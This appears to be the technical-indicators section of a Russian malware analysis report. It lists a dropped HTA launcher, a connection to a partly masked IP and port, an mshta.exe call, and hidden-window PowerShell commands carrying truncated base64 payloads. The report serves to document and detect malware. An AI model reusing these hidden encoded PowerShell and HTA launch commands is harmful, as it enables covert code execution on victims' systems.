Техническая информация
- %TEMP%\{48c2fd1e-034e-4b58-a1dc-039ff0e6268e}\launcher (scrambled).hta
- '3.##.191.225':13528
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...' (со скрытым окном)
- '<SYSTEM32>\mshta.exe' "%TEMP%\{48C2FD1E-034E-4B58-A1DC-039FF0E6268E}\launcher (scrambled).hta"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACc...